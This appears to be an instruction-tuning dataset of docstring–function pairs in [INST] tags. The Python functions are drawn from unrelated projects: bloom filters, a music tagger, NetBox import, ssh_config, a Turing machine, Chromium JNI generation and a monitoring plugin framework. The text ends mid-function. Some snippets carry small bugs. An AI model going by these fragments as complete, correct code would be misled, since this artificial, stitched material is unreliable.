[/INST] def is_unique_set(set_name, item): + result = is_in_set(set_name, item) + return result == ITEM_NOT_FOUND_IN_SET +[INST] Adds items to specified bloom filter and formats return as boolean. +Keyword arguments: +bloom_filter -- the bloom filter +item -- the item to add + +boolean indicating success + +AssertionError on None value args. [/INST] def add_to_bloom_filter_format_result(bloom_filter, item): + result = add_bloom_filter(bloom_filter, item) + return result == ITEM_ADDED_SUCCESSFULLY_BLOOM_FILTER +[INST] Checks for item in specified bloom filter. +Keyword arguments: +bloom_filter -- the bloom filter +item -- the item to check. [/INST] def is_in_bloom_filter(bloom_filter, item): + assert bloom_filter is not None + assert item is not None + r_client = RedisConn().get_client() + return r_client.bf().exists(bloom_filter, item) +[INST] Converts Redis results to boolean representing if item was unique (aka not found). +Keyword arguments: +bloom_filter -- the bloom filter +item -- the item to check. [/INST] def is_unique_bloom_filter(bloom_filter, item): + result = is_in_bloom_filter(bloom_filter, item) + return result == ITEM_NOT_FOUND_IN_BLOOM_FILTER +[INST] Prompts user for API keys, adds them in an .ini file stored in the same +location as that of the script. [/INST] def add_config(): + genius_key = input('Enter Genius key : ') + bing_key = input('Enter Bing key : ') + CONFIG['keys']['bing_key'] = bing_key + CONFIG['keys']['genius_key'] = genius_key + with open(config_path, 'w') as configfile: + CONFIG.write(configfile) +[INST] Prompts for song number from list of songs. [/INST] def prompt(youtube_list): + option = int(input('\nEnter song number > ')) + try: + song_url = list(youtube_list.values())[option - 1] + song_title = list(youtube_list.keys())[option - 1] + except IndexError: + log.log_error('Invalid Input') + exit() + system('clear') + print('Download Song: ') + print(song_title) + print('Y/n?') + confirm = input('>') + if confirm == '' or confirm.lower() == 'y': + pass + elif confirm.lower() == 'n': + exit() + else: + log.log_error('Invalid Input') + exit() + return song_url, song_title +[INST] Downloads song from youtube-dl. [/INST] def download_song(song_url, song_title): + outtmpl = song_title + '.%(ext)s' + ydl_opts = { + 'format': 'bestaudio/best', + 'outtmpl': outtmpl, + 'postprocessors': [{ + 'key': 'FFmpegExtractAudio', + 'preferredcodec': 'mp3', + 'preferredquality': '192', + }, + {'key': 'FFmpegMetadata'}, + ], + } + with youtube_dl.YoutubeDL(ydl_opts) as ydl: + info_dict = ydl.extract_info(song_url, download=True) +[INST] Improves file name by removing crap words. [/INST] def songname(song_name): + try: + song_name = splitext(song_name)[0] + except IndexError: + pass + chars_filter = "()[]{}-:_/=+\"\'" + words_filter = ('official', 'lyrics', 'audio', 'remixed', 'remix', 'video', + 'full', 'version', 'music', 'mp3', 'hd', 'hq', 'uploaded') + song_name = ''.join(map(lambda c: " " if c in chars_filter else c, song_name)) + song_name = re.sub('|'.join(re.escape(key) for key in words_filter), + "", song_name, flags=re.IGNORECASE) + song_name = re.sub(' +', ' ', song_name) + return song_name.strip() +[INST] Provides a score out of 10 that determines the +relevance of the search result. [/INST] def matching_details(song_name, song_title, artist): + match_name = difflib.SequenceMatcher(None, song_name, song_title).ratio() + match_title = difflib.SequenceMatcher(None, song_name, artist + song_title).ratio() + if max(match_name,match_title) >= 0.55: + return True, max(match_name,match_title) + else: + return False, (match_name + match_title) / 2 +[INST] Adds the album art to the song. [/INST] def add_albumart(albumart, song_title): + try: + img = urlopen(albumart) + except Exception: + log.log_error("* Could not add album art", indented=True) + return None + audio = EasyMP3(song_title, ID3=ID3) + try: + audio.add_tags() + except _util.error: + pass + audio.tags.add( + APIC( + encoding=3, + mime='image/png', + type=3, + desc='Cover', + data=img.read() + ) + ) + audio.save() + log.log("> Added album art") +[INST] Searches for '.mp3' files in directory (optionally recursive) +and checks whether they already contain album art and album name tags or not.. [/INST] def fix_music(file_name): + setup() + if not Py3: + file_name = file_name.encode('utf-8') + tags = File(file_name) + log.log(file_name) + log.log('> Adding metadata') + try: + artist, album, song_name, lyrics, match_bool, score = get_details_spotify( + file_name) + except Exception: + artist, album, song_name, lyrics, match_bool, score = get_details_letssingit( + file_name) + try: + log.log_indented('* Trying to extract album art from Google.com') + albumart = albumsearch.img_search_google(artist+' '+album) + except Exception: + log.log_indented('* Trying to extract album art from Bing.com') + albumart = albumsearch.img_search_bing(artist+' '+album) + if match_bool: + add_albumart(albumart, file_name) + add_details(file_name, song_name, artist, album, lyrics) + try: + rename(file_name, artist+' - '+song_name+'.mp3') + except Exception: + log.log_error("Couldn't rename file") + pass + else: + log.log_error( + "* Couldn't find appropriate details of your song", indented=True) + log.log("Match score: %s/10.0" % round(score * 10, 1)) + log.log(LOG_LINE_SEPERATOR) + log.log_success() +[INST] Provision the config context based on the json file present in the config-contexts folder. +Uses the json filename as config context name. Applies it to the roles leaf and spine. +Limitation: Do not update the Config context if the content of the json file change.. [/INST] def provision_config_context(): + for file in glob.glob('config-contexts/*.json'): + with open(file) as json_data: + ccdata = json.load(json_data) + ccname= os.path.basename(file).split(".")[0] + get_or_create(nb.extras.config_contexts, search='name', name=ccname, data= ccdata, roles=[role_leaf.id,role_spine.id]) +[INST] Converts dirty strings into something URL-friendly. +FYI - Ordering is important.. [/INST] def slugify(s): + s = s.lower() + for c in [' ', '-', '.', '/']: + s = s.replace(c, '_') + s = re.sub(r'\W', '', s) + s = s.replace('_', ' ') + s = re.sub(r'\s+', ' ', s) + s = s.strip() + s = s.replace(' ', '-') + return s +[INST] Uses ruamel.yaml to load YAML files.. [/INST] def load_yaml(yaml_file: str): + yf = Path(yaml_file) + if not yf.is_file(): + return None + with yf.open("r") as stream: + yaml = YAML(typ="safe") + return yaml.load(stream) +[INST] Runs multiple checks to see if the device type already exists in NetBox.. [/INST] def device_type_exists(device_type): + try: + print(f"Checking if {device_type['model']} exists") + _slug = slugify(device_type['model']) + if nb.dcim.device_types.filter(model=device_type['model']): + print(f"Found device_type dict {device_type['model']}") + return True + elif nb.dcim.device_types.get(model=device_type['model']): + print(f"Found device_type name {device_type['model']}") + return True + elif nb.dcim.device_types.get(slug=device_type['slug']): + print(f"Found device_type slug {device_type['slug']}") + return True + elif nb.dcim.device_types.get(slug=_slug): + print(f"Found device_type _slug {_slug}") + return True + else: + return False + except Exception as e: + raise DeviceTypeLookupError(f"Error for {device_type}: {e}") +[INST] Validates and modifies data before inserting in NetBox.. [/INST] def validate_device_data(device_type): + if not isinstance(device_type, dict): + raise DeviceTypeValidationError(f"Validation FAILED for {device_type}: \ + {type(device_type)} is not a dict") + man = device_type['manufacturer'] + man_id = get_or_create_manufacturer(man) + device_type['manufacturer'] = man_id + return device_type +[INST] Validates and verifies the device type before inserting in NetBox.. [/INST] def process_device_type(device_type): + device_type = validate_device_data(device_type) + does_exist = device_type_exists(device_type) + if does_exist is False: + print(f"Adding new device-type {device_type['model']}") + nb.dcim.device_types.create(device_type) + else: + print(f"Already a device_type: {device_type['model']}") + print(f"Checking for templates: {device_type['model']}") + process_templates(device_type) +[INST] Process a YAML file for importing to NetBox.. [/INST] def process_yaml(yml_file): + device_type = load_yaml(yml_file) + process_device_type(device_type) +[INST] Remove a host entry or specific options in a host entry.. [/INST] def remove(self, host, *options): + if len(options) == 0: + del self[host] + else: + entry = self.get(host) + entry.remove(*options) + if len(entry) == 0: + self.remove(host) +[INST] Save the configuration somewhere safe.. [/INST] def save(self, dest): + if (isinstance(dest, file)): + dest.write(str(self)) + elif isinstance(dest, str): + f = open(dest, "w") + f.write(str(self)) + f.close() + else: + raise TypeError("Argument is not a file or str") +[INST] Get the priority of this host entry. This is used for ordering in +the eventual ssh_config.. [/INST] def priority(self): + return self.__priority +[INST] Converts the SshConfigEntry to a dict.. [/INST] def to_dict(self): + l = {} + l.update(self.__options) + return l +[INST] Calculate the new state of the machine after a character. +Returns the transition object which contains a 3-tuple of: +The new state, the output letter and the direction to move on +the tape. [/INST] def calc(self, character): + return self.transitions[character] +[INST] Updates the tape to allow experimentation with the TM. [/INST] def new_tape(self, tape): + self._update_tape(tape) + self._update_current_state(self._start_state) + assert self._reset_loops >= 0 + self.MAX_LOOPS = self._reset_loops +[INST] Internal method for updating the tape. [/INST] def _update_tape(self, tape): + self.tape_position = 0 + if self.tape != None: + self.tape.clear() + assert(len(self.tape) == 0) + if isinstance(tape, list): + self.tape = [str(c) for c in tape] + elif type(tape) is str: + self.tape = [c for c in tape] + elif type == None: + self.tape = [] + else: + raise ValueError("Tape has to be a list of symbols or a String (or Nothing)") + self.tape.append(self.EMPTY_SYMBOL) +[INST] Internal method for updating the accept state +Generally it is advised that this is not changed at once the +machine has began. [/INST] def _update_accept_state(self, accept_state): + assert accept_state != None + TuringMachine._test_state(accept_state) + self.accept_state = accept_state +[INST] Internal method for updating the reject state +Generally it is advised that this is not changed at once the +machine has began. [/INST] def _update_reject_state(self, reject_state): + TuringMachine._test_state(reject_state) + self.reject_state = reject_state +[INST] Internal method for updating the start state. +Can only be update ONCE upon CREATION OF THE TM.. [/INST] def _update_start_state(self, start_state): + assert self._start_state == None + TuringMachine._test_state(start_state) + self._start_state = start_state +[INST] Compute the result after the next symbol. [/INST] def _read(self, symbol): + self.MAX_LOOPS = self.MAX_LOOPS - 1 + t = self.current_state.calc(symbol) + self._move_tape(t.output_letter, t.movement_direction) + self._update_current_state(t.new_state) +[INST] Checks if path is a directory.. [/INST] def is_directory(dir_path): + isdir = os.path.isdir(dir_path) + logger.debug("Path specified %s", dir_path) + return isdir +[INST] Generates files required to perform JNI registration. +Generates a srcjar containing a single class, GEN_JNI, that contains all +native method declarations. + +Optionally generates a header file that provides functions +(RegisterMainDexNatives and RegisterNonMainDexNatives) to perform +JNI registration.. [/INST] def _Generate(java_file_paths, + srcjar_path, + proxy_opts, + header_path=None, + namespace=''): + results = [] + with multiprocessing.Pool() as pool: + for d in pool.imap_unordered( + functools.partial(_DictForPath, use_proxy_hash=proxy_opts.use_hash), + java_file_paths): + if d: + results.append(d) + results.sort(key=lambda d: d['FULL_CLASS_NAME']) + combined_dict = {} + for key in MERGEABLE_KEYS: + combined_dict[key] = ''.join(d.get(key, '') for d in results) + if header_path: + combined_dict['HEADER_GUARD'] = \ + os.path.splitext(header_path)[0].replace('/', '_').upper() + '_' + combined_dict['NAMESPACE'] = namespace + header_content = CreateFromDict(combined_dict, proxy_opts.use_hash) + with build_utils.AtomicOutput(header_path, mode='w') as f: + f.write(header_content) + with build_utils.AtomicOutput(srcjar_path) as f: + with zipfile.ZipFile(f, 'w') as srcjar: + if proxy_opts.use_hash: + build_utils.AddToZipHermetic( + srcjar, + '%s.java' % jni_generator.ProxyHelpers.GetQualifiedClass(True), + data=CreateProxyJavaFromDict(combined_dict, proxy_opts)) + build_utils.AddToZipHermetic( + srcjar, + '%s.java' % jni_generator.ProxyHelpers.GetQualifiedClass(False), + data=CreateProxyJavaFromDict( + combined_dict, proxy_opts, forwarding=True)) + else: + build_utils.AddToZipHermetic( + srcjar, + '%s.java' % jni_generator.ProxyHelpers.GetQualifiedClass(False), + data=CreateProxyJavaFromDict(combined_dict, proxy_opts)) +[INST] Add the content of the forward declaration to the dictionary.. [/INST] def _AddForwardDeclaration(self): + template = string.Template("""\ +JNI_GENERATOR_EXPORT ${RETURN} ${STUB_NAME}( + JNIEnv* env, + ${PARAMS_IN_STUB}); +""") + forward_declaration = '' + for native in self.natives: + value = { + 'RETURN': jni_generator.JavaDataTypeToC(native.return_type), + 'STUB_NAME': self.helper.GetStubName(native), + 'PARAMS_IN_STUB': jni_generator.GetParamsInStub(native), + } + forward_declaration += template.substitute(value) + self._SetDictValue('FORWARD_DECLARATIONS', forward_declaration) +[INST] Add the body of the RegisterNativesImpl method to the dictionary.. [/INST] def _AddRegisterNativesCalls(self): + if len(self.non_proxy_natives) == 0: + return '' + template = string.Template("""\ + if (!${REGISTER_NAME}(env)) + return false; +""") + value = { + 'REGISTER_NAME': + jni_generator.GetRegistrationFunctionName(self.fully_qualified_class) + } + register_body = template.substitute(value) + if self.main_dex: + self._SetDictValue('REGISTER_MAIN_DEX_NATIVES', register_body) + else: + self._SetDictValue('REGISTER_NON_MAIN_DEX_NATIVES', register_body) +[INST] Returns the implementation of the array of native methods.. [/INST] def _AddJNINativeMethodsArrays(self): + template = string.Template("""\ +static const JNINativeMethod kMethods_${JAVA_CLASS}[] = { +${KMETHODS} +}; +""") + open_namespace = '' + close_namespace = '' + if self.namespace: + parts = self.namespace.split('::') + all_namespaces = ['namespace %s {' % ns for ns in parts] + open_namespace = '\n'.join(all_namespaces) + '\n' + all_namespaces = ['} // namespace %s' % ns for ns in parts] + all_namespaces.reverse() + close_namespace = '\n'.join(all_namespaces) + '\n\n' + body = self._SubstituteNativeMethods(template) + self._SetDictValue('JNI_NATIVE_METHOD_ARRAY', ''.join((open_namespace, body, + close_namespace))) +[INST] Returns KMethodString for wrapped native methods in all_classes. [/INST] def _AddProxyNativeMethodKStrings(self): + if self.main_dex: + key = 'PROXY_NATIVE_METHOD_ARRAY_MAIN_DEX' + else: + key = 'PROXY_NATIVE_METHOD_ARRAY' + proxy_k_strings = ('\n'.join( + self._GetKMethodArrayEntry(p) for p in self.proxy_natives)) + self._SetDictValue(key, proxy_k_strings) +[INST] Substitutes NAMESPACE, JAVA_CLASS and KMETHODS in the provided +template.. [/INST] def _SubstituteNativeMethods(self, template, sub_proxy=False): + ret = [] + all_classes = self.helper.GetUniqueClasses(self.natives) + all_classes[self.class_name] = self.fully_qualified_class + for clazz, full_clazz in all_classes.items(): + if not sub_proxy: + if clazz == jni_generator.ProxyHelpers.GetClass(self.use_proxy_hash): + continue + kmethods = self._GetKMethodsString(clazz) + namespace_str = '' + if self.namespace: + namespace_str = self.namespace + '::' + if kmethods: + values = { + 'NAMESPACE': namespace_str, + 'JAVA_CLASS': jni_generator.EscapeClassName(full_clazz), + 'KMETHODS': kmethods + } + ret += [template.substitute(values)] + if not ret: return '' + return '\n'.join(ret) +[INST] Returns the implementation of the array of native methods.. [/INST] def GetJNINativeMethodsString(self): + template = string.Template("""\ +static const JNINativeMethod kMethods_${JAVA_CLASS}[] = { +${KMETHODS} +}; +""") + return self._SubstituteNativeMethods(template) +[INST] Returns the code for RegisterNatives.. [/INST] def _AddRegisterNativesFunctions(self): + natives = self._GetRegisterNativesImplString() + if not natives: + return '' + template = string.Template("""\ +JNI_REGISTRATION_EXPORT bool ${REGISTER_NAME}(JNIEnv* env) { +${NATIVES}\ + return true; +} +""") + values = { + 'REGISTER_NAME': + jni_generator.GetRegistrationFunctionName(self.fully_qualified_class), + 'NATIVES': + natives + } + self._SetDictValue('JNI_NATIVE_METHOD', template.substitute(values)) +[INST] Returns the shared implementation for RegisterNatives.. [/INST] def _GetRegisterNativesImplString(self): + template = string.Template("""\ + const int kMethods_${JAVA_CLASS}Size = + base::size(${NAMESPACE}kMethods_${JAVA_CLASS}); + if (env->RegisterNatives( + ${JAVA_CLASS}_clazz(env), + ${NAMESPACE}kMethods_${JAVA_CLASS}, + kMethods_${JAVA_CLASS}Size) < 0) { + jni_generator::HandleRegistrationError(env, + ${JAVA_CLASS}_clazz(env), + __FILE__); + return false; + } +""") + if len(self.non_proxy_natives) != 0: + return self._SubstituteNativeMethods(template) + return '' +[INST] Applies tuple fields (name, value) to xml. +Both items must be not None to show in attribute list.. [/INST] def _open_tag(self, indent_lvl=0, **kwargs): + return self._sub( + self._crlf + "{i}<{name}".format(i=self._indent * indent_lvl, + name=self._tag_name) + + ''.join(' {name}="{val}"'.format(name=name, val=val) + for (name, val) in self._fields + if val is not None) + + '>', **kwargs) +[INST] Will add text or another (arbitrary complex) XmlBuilder as children of element.. [/INST] def innerText(self, child): + self._children.append(child) + return self +[INST] Recursively converts self and all children to xml.. [/INST] def dump(self, indent_lvl=0, **kwargs): + dumped_children = [] + for child in filter(None, self._children): + if isinstance(child, XmlBuilder): + dumped_children.append(child.dump(indent_lvl=(indent_lvl + 1), + **kwargs)) + else: + dumped_children.append("{child}".format(child=self._sub(child, + **kwargs))) + if self._tag_name: + return (self._open_tag(indent_lvl, **kwargs) + + ''.join(dumped_children) + + self._close_tag(indent_lvl, **kwargs)) + return ''.join(dumped_children) +[INST] Provided data (from plugins dictionary) and walking template, get all valid +items and convert it to jUnit xml representation. + +Function have sane defaults (depends on calee opinion).. [/INST] def plugins_to_xml(dict_data, + yaml_filename=None, + yaml_data=default_config.YAML_CONFIG, + dict_templates=['All'], + additional_fields='AdditionalFields', + ts_attr='HtmlTestSuiteAttr', + tc_attr='HtmlTestCaseAttr', + tc_elem='HtmlTestCaseElem'): + def _apply(inst, custom_dict=None, **kwargs): + applied_args = {} + if custom_dict: + for k, v in custom_dict.items(): + applied_args[k] = getattr(inst, v) + for k, v in kwargs.items(): + applied_args[k] = getattr(inst, v) + return applied_args + if yaml_filename: + with open(yaml_filename) as f: + C = yaml.safe_load(f) + else: + C = yaml.safe_load(yaml_data) + results = {} + for template in dict_templates: + results[template] = rows.create(data=dict_data, + template=C[template], + additional_fields=C[additional_fields]) + ts_data = {} + for res in results.keys(): + ts_data[res] = collections.defaultdict(list) + ts_res = ts_data[res] + for row in results[res]: + ts_res[row.Node].append(row) + junit_xml = XmlBuilder() + for template_name, ts in ts_data.items(): + with junit_xml.testsuites as html_tss: + html_tss(name=template_name) + for _node, tcs in ts.items(): + with html_tss.testsuite as html_ts: + first = tcs[0] if tcs else None + if first: + html_ts(custom_dict=_apply(first, + custom_dict=C[ts_attr])) + for tc in tcs: + html_tc = html_ts.testcase( + custom_dict=_apply(tc, custom_dict=C[tc_attr])) + if tc.CaseStatus: + distinguisher = tc.CaseStatus + else: + distinguisher = tc.PluginStatus + if not tc.CaseName: + html_tc.name = tc.Plugin + if distinguisher == 'ERROR': + if tc.MsgError: + html_tc.error(message=escape( + list_to_string(tc.MsgError), quote=1)) + else: + html_tc.error() + elif distinguisher == 'WARN': + out = html_tc.__getattr__('system-out') + if tc.MsgWarn: + out.__setattr__('message', escape( + list_to_string(tc.MsgWarn), quote=1)) + return junit_xml.dump() +[INST] Stop all plugins +Wait until they are stopped if blocking=True. [/INST] def stop(self, blocking=True): + self.stopping = True + for plugin in self.plugins.values(): + if plugin.current_run: + plugin.current_run.stop() + plugin.current_run.terminate() + if blocking: + plugins_left = self.plugins.keys() + plugins_left_cnt = len(plugins_left) + while plugins_left: + plugins_left = [] + for name, plugin in self.plugins.items(): + if not plugin.current_run: + continue + if plugin.current_run.is_alive(): + plugins_left.append(name) + else: + plugin.current_run.join() + if plugins_left: + if len(plugins_left) != plugins_left_cnt: + lg.info("Waiting for %s plugins to shutdown: %s" % (len(plugins_left), ','.join(plugins_left))) + plugins_left_cnt = len(plugins_left) + time.sleep(0.5) +[INST] Add process and force plugin run. [/INST] def add_process(self, plugins=None, filter=None): + plugins_list = [] + if plugins: + for plugin in plugins: + plugins_list.append(self.get_plugin(plugin)) + if filter: + plugins_list.extend(self.get_plugins(filter)) + if len(plugins_list) == 0: + raise NoPluginsFound + process = { + 'plugins' : plugins_list, + } + plugins_name = [] + for p in plugins_list: + plugins_name.append(p.name) + lg.info("Forcing run of %d plugins: %s" % (len(plugins_list), ', '.join(plugins_name))) + self.processes.append(process) + id = len(self.processes)-1 + for plugin in plugins_list: + plugin.forced = True + plugin.forced_result = None + plugin.run() + return id +[INST] Start run of plugins configured as such. [/INST] def run_plugins_with_interval(self): + for plugin in self.plugins.values(): + if not plugin.params['Interval']: + continue + plugin.run() +[INST] Join zombie workers of interval-triggered runs +The results will be picked by REST server forked ends of the queues. [/INST] def join_timed_plugin_workers(self): + for plugin in self.plugins.values(): + if not plugin.params['Interval']: + continue + if plugin.current_run: + plugin.current_run.join() + plugin.current_run = None +[INST] Validate configuration +Raise InvalidConfiguration exception if invalid. [/INST] def validate(self): + if self.params['Timeout'] <= 0: + raise InvalidConfiguration("Timeout parameter can't be 0") + if not self.params['Command'] and not self.params['Module']: + raise InvalidConfiguration("Command or Module parameter has to be set") + if self.params['Command'] and self.params['Module']: + raise InvalidConfiguration("Command and Module parameters cannot be set together") + if not self.params['Command'] and self.params['Parser']: + raise InvalidConfiguration("Parser can be used only with Command parameter") +[INST] Run process +Check if plugin should be run and execute it. [/INST] def run(self): + if self.current_run: + if self.current_run.is_alive(): + return + self.current_run.join() + if self.forced: + self.current_run = PluginWorker(self.name, self.queue, self.params, + self.forced) + self.current_run.start() + elif self.params['Interval']: + if datetime.datetime.now() >= self.next_run: + self.current_run = PluginWorker(self.name, self.queue, + self.params) + self.current_run.start() + self.schedule_run() +[INST] Schedule next plugin run +Accept datetime object as time parameter or set +current time if now parameter is True. [/INST] def schedule_run(self, time=None, now=False): + if time: + if isinstance(time, datetime.datetime): + self.next_run = time + else: + raise InvalidArgument( + 'Parameter time has to be an instance of datetime object') + elif now: + self.next_run = datetime.datetime.now() + elif self.params['Interval']: + self.next_run = ( + datetime.datetime.now() + + datetime.timedelta(seconds=self.params['Interval'])) +[INST] Run system command and parse output. [/INST] def run_command(self, command, timeout=0): + result = Result() + lg.debug("Plugin %s: executing command %s" % (self.name, command)) + try: + stdout, stderr, returncode = smoker.util.command.execute( + command, timeout=timeout) + except smoker.util.command.ExecutionTimeout as e: + raise PluginExecutionTimeout(e) + except Exception as e: + lg.exception(e) + raise PluginExecutionError( + "Can't execute command %s: %s" % (command, e)) + if returncode: + status = 'ERROR' + else: + status = 'OK' + if self.params['Parser']: + try: + result = self.run_parser(stdout, stderr) + except Exception as e: + result.set_status('ERROR') + result.add_error(re.sub('^\n', '', stderr.strip())) + result.add_error('Parser run failed: %s' % e) + result.add_info(re.sub('^\n', '', stdout.strip())) + else: + json = None + try: + json = simplejson.loads(stdout) + except: + pass + if json: + if 'status' in json and json['status'] in [ 'OK', 'ERROR', 'WARN' ]: + try: + result.set_result(json, validate=True) + except ValidationError as e: + raise PluginMalformedOutput("Invalid JSON structure: %s" % e) + else: + raise PluginMalformedOutput("Missing status in JSON output: %s" % json) + else: + lg.debug("Plugin %s: using non-JSON output" % self.name) + result.set_status(status) + if stderr: + result.add_error(re.sub('^\n', '', stderr.strip())) + if stdout: + result.add_info(re.sub('^\n', '', stdout.strip())) + return result +[INST] Run parser on given stdout/stderr +Raise exceptions if anything happen. [/INST] def run_parser(self, stdout, stderr): + lg.debug("Plugin %s: running parser %s" % (self.name, self.params['Parser'])) + if stdout: + lg.debug("Plugin %s: stdout: %s" % (self.name, stdout.strip())) + if stderr: + lg.debug("Plugin %s: stderr: %s" % (self.name, stderr.strip())) + try: + parser = __import__(self.params['Parser'], globals(), locals(), ['Parser'], 0) + except ImportError as e: + lg.error("Plugin %s: can't load parser %s: %s" % (self.name, self.params['Parser'], e)) + raise + try: + parser = parser.Parser(stdout, stderr) + except Exception as e: + lg.error("Plugin %s: can't initialize parser: %s" % (self.name, e)) + lg.exception(e) + raise + try: + result = parser.parse() + except Exception as e: + lg.error("Plugin %s: parser execution failed: %s" % (self.name, e)) + lg.exception(e) + raise + return result +[INST] Run Python module +Raise exceptions if anything happen. [/INST] def run_module(self, module, **kwargs): + lg.debug("Plugin %s: running module %s" % (self.name, module)) + try: + plugin = __import__(module, globals(), locals(), ['Plugin'], 0) + except ImportError as e: + lg.error("Plugin %s: can't load module %s: %s" % + (self.name, module, e)) + raise + try: + plugin = plugin.Plugin(self, **kwargs) + except Exception as e: + lg.error("Plugin %s: can't initialize plugin module: %s" % + (self.name, e)) + lg.exception(e) + raise + signal.signal(signal.SIGALRM, alarm_handler) + if 'timeout' not in kwargs: + kwargs['timeout'] = self.get_param('Timeout', default=120) + try: + signal.alarm(kwargs['timeout']) + result = plugin.run() + if not result: + result = plugin.result + except PluginExecutionTimeout: + result = self.error_result( + 'Plugin execution exceeded timeout %d seconds' % + kwargs['timeout']) + except Exception as e: + lg.error("Plugin %s: module execution failed: %s" % (self.name, e)) + lg.exception(e) + signal.alarm(0) + raise + signal.alarm(0) + return result +[INST] Run plugin, save result and schedule next run. [/INST] def run_plugin(self, force=False): + if self.params['Command']: + command = self.params['Command'] % self.escape(dict(self.params)) + try: + result = self.run_command(command, self.params['Timeout']) + except Exception as e: + lg.error("Plugin %s: %s" % (self.name, e)) + result = self.error_result(e) + elif self.params['Module']: + try: + result = self.run_module(self.params['Module']) + except Exception as e: + lg.error("Plugin %s: %s" % (self.name, e)) + result = self.error_result( + re.sub('^\n', '', ('%s' % e).strip())) + else: + lg.error("Plugin %s: no Command or Module to execute!" % self.name) + result = self.error_result('No Command or Module to execute!') + if self.params['Action']: + lg.debug("Plugin %s: executing action" % self.name) + if self.params['Action']['Command']: + params = dict(self.params, **result.result) + params = self.escape(params) + try: + action = self.run_command( + self.params['Action']['Command'] % + params, timeout=self.params['Action']['Timeout']) + except Exception as e: + lg.error("Plugin %s: %s" % (self.name, e)) + action = self.error_result(e) + elif self.params['Action']['Module']: + try: + action = self.run_module( + self.params['Action']['Module'], result=result) + except Exception as e: + lg.error("Plugin %s: %s" % (self.name, e)) + action = self.error_result(e) + else: + lg.error("Plugin %s: no Action Command or Module to execute!" % + self.name) + action = self.error_result('No Command or Module to execute!') + result.set_action(action) + result.set_forced(force) + try: + self.result = result.get_result() + except ValidationError as e: + lg.error("Plugin %s: ValidationError: %s" % (self.name, e)) + result = self.error_result('ValidationError: %s' % e) + result.set_forced(force) + self.result = result.get_result() + lg.info("Plugin %s result: %s" % (self.name, result.get_result())) +[INST] Escape given string, dictionary or list +If int, None or bool item is found, just pass +Also pass if item can't be escaped by some other reason +Raise exception if unknown data type. [/INST] def escape(self, tbe): + if isinstance(tbe, dict): + escaped = {} + for key, value in tbe.items(): + if type(value) in [int, type(None), bool]: + escaped[key] = value + else: + try: + escaped[key] = re.escape(value) + except: + escaped[key] = value + elif isinstance(tbe, basestring): + try: + escaped = re.escape(tbe) + except: + escaped = tbe + elif isinstance(tbe, int) or isinstance(tbe, bool): + escaped = tbe + elif isinstance(tbe, list): + escaped = [] + for value in tbe: + if type(value) in [int, type(None), bool]: + escaped.append(value) + else: + try: + escaped.append(re.escape(value)) + except: + escaped.append(value) + else: + raise Exception("Unknown data type") + return escaped +[INST] close unnecessary open sockets cloned on fork. [/INST] def close_unnecessary_sockets(self): + open_sockets = list() + allowed = ['socket.socket', 'socket._socketobject'] + for x in gc.get_objects(): + if any(t for t in allowed if t in repr(type(x))): + open_sockets.append(x) + for cur_socket in open_sockets: + if cur_socket.type == socket.SOCK_STREAM: + cur_socket.close() +[INST] Add message into result +Empty messages are skipped + +don't split message lines into +multiple messages. [/INST] def add_msg(self, level, msg, multiline=False): + if not self.result['messages']: + self.result['messages'] = { + 'info' : [], + 'error': [], + 'warn' : [], + } + if not multiline: + messages = str(msg).split('\n') + else: + messages = [str(msg)] + for message in messages: + if not str(msg).strip(): + continue + try: + self.result['messages'][level].append(str(message).strip()) + except KeyError: + raise InvalidArgument("Level has to be info, error or warn") +[INST] Validate result +Skip if it was already validated to avoid +unwanted re-validation. [/INST] def validate(self, force=False): + if force != True and self.validated == True: + return True + else: + try: + self._validate_status(self.result['status']) + self._validate_msg(self.result['messages']) + self._validate_component_result(self.result['componentResults']) + self._validate_action(self.result['action']) + finally: + self.validated = True +[INST] Execute smoker.util.command.execute() with timeout (default 120 seconds) +You shouldn't use anything else than this function from inside plugins!. [/INST] def execute(self, command, **kwargs): + if 'timeout' not in kwargs: + kwargs['timeout'] = self.plugin.get_param('Timeout', default=120) + return smoker.util.command.execute(command, **kwargs) +[INST] Convert next run timestamp object to the ISO format. [/INST] def next_run_iso_format(next_run): + if isinstance(next_run, bool): + next_run = None + else: + next_run = next_run.isoformat() + return next_run +[INST] Convert result dict to list just to have standardized API. [/INST] def standardized_api_list(component): + keyword = 'componentResults' + if (not isinstance(component, dict) or + keyword not in component or + not component[keyword]): + return component + results = dict(component) + results[keyword] = [] + for key, value in component[keyword].items(): + value['name'] = key + results[keyword].append({'componentResult': value}) + return results +[INST] Print information about set of plugins. [/INST] def print_plugins(plugins, forced=False): + plugins_result = [] + for plugin in plugins: + plugins_result.append(print_plugin(plugin, forced)) + return {'plugins': {'items': plugins_result}} +[INST] Format json info about process in progress. [/INST] def print_in_progress(id): + location = '/processes/%d' % id + data = { + 'asyncTask': { + 'link': { + 'poll': location + } + } + } + response = make_response(json.dumps(data, indent=2)) + response.status = 'Accepted' + response.status_code = 202 + response.headers['Location'] = location + response.headers['content-type'] = 'application/json' + return response +[INST] Execute command, wrapper for Command class. [/INST] def execute(command, timeout=None, **kwargs): + cmd = Command(command, **kwargs) + return cmd.run(timeout) +[INST] Send signal to whole process tree +By default send SIGTERM (15). +If process doesn't exist, just pass. [/INST] def signal_ptree(pid, signal=15): + try: + process = psutil.Process(pid) + except psutil.NoSuchProcess: + return + children = get_ptree(process) + lg.info('Sending signal to process tree: signal=%s pid=%s process=%s children=%s' % (signal, process.pid, process.name, len(children))) + if children: + for child in children: + try: + lg.info('Sending signal to child process: signal=%s pid=%s process=%s' % (signal, child.pid, child.name)) + os.kill(child.pid, signal) + except OSError as e: + if e.errno == 3: + lg.debug('Children process does not exist: pid=%s process=%s' % (child.pid, child.name)) + continue + try: + lg.info('Sending signal to parent process: signal=%s pid=%s process=%s' % (signal, process.pid, process.name)) + os.kill(process.pid, signal) + except OSError as e: + if e.errno == 3: + lg.debug('Parent process does not exist: pid=%s process=%s' % (process.pid, process.name)) + pass +[INST] Register cleanup function for given process id. [/INST] def _register_cleanup(pid): + lg.debug("Registering cleanup for pid %s" % pid) + atexit.register(_proc_cleanup, pid) +[INST] Unregister cleanup function for given process id. [/INST] def _unregister_cleanup(pid): + lg.debug("Unregistering cleanup for pid %s" % pid) + if _PY3: + atexit.unregister(_proc_cleanup) + return + for handler in atexit._exithandlers: + (func, args, kwargs) = handler + if func == _proc_cleanup and args == (pid,): + atexit._exithandlers.remove(handler) +[INST] Run command with given timeout. +Return tuple of stdout, stderr strings and retval integer.. [/INST] def run(self, timeout=None, timeout_sigterm=3, timeout_sigkill=5): + def target(): + try: + self.process = subprocess.Popen(self.command, 